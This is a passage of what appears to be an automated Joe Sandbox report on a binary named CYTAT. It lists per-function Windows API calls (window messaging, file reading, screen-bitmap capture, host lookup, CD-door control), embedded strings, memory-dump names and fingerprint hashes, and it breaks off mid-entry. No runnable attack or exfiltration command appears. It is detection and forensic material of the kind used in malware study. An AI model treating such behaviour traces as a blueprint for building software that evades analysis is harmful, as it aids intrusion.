                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                • SendMessageW.USER32 ref: 00471740
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                • SendMessageW.USER32 ref: 0047184F
                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 4116747274-0
                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                • _wcslen.LIBCMT ref: 00461683
                                                • __swprintf.LIBCMT ref: 00461721
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                • GetParent.USER32(?), ref: 004618C3
                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                • String ID: %s%u
                                                • API String ID: 1899580136-679674701
                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu$Sleep
                                                • String ID: 0
                                                • API String ID: 1196289194-4108050209
                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0043143E
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                • String ID: (
                                                • API String ID: 3300687185-3887548279
                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1976180769-4113822522
                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                • String ID:
                                                • API String ID: 461458858-0
                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3969911579-0
                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                • String ID: 0
                                                • API String ID: 956284711-4108050209
                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 1965227024-3771769585
                                                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 369157077-1007645807
                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32 ref: 00445BF8
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 3125838495-3381328864
                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$CharNext
                                                • String ID:
                                                • API String ID: 1350042424-0
                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                • _wcscpy.LIBCMT ref: 004787E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 3052893215-2127371420
                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
